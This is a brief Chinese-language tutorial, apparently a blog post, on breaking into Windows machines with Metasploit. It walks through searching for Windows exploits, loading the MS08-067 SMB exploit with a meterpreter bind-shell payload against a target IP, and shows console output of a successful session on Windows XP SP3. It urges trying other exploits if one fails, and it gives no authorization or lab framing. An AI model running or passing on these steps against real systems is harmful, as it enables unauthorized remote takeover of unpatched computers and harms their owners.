使用Metasploit入侵windows

使用msfconsole 查看window发布的漏洞

运气好的话 你要破解的windows没有打补丁.那么使用该漏洞你就可以直接登陆到windows了

# msfconsole

msf > search platform: windows xp sp3 
msf > search platform: windows 10
msf > search platform: android


msf > info exploit/windows/smb/ms08_067_netapi
使用info查看漏洞信息.

msf > use exploit/windows/smb/ms08_067_netapi
> set payload windows/meterpreter/bind_tcp
> set RHOST 192.168.0.108  (设置目标主机IP地址)
> exploit
设定攻击方式.攻击ip

攻击成功:
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP SP3 - Service Pack 3 - lang:Chinese
[*] Selected Target: Windows XP SP3 Chinese (AlwaysOn NK)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (751104 bytes) to 192.168.0.108
[*] Meterpreter session 1 opened (192.168.0.1:41614 -> 192.168.0.108:4444) at 2016-04-15 17:29:32

meterpreter >

失败就尝试其他漏洞


你可能感兴趣的:(使用Metasploit入侵windows)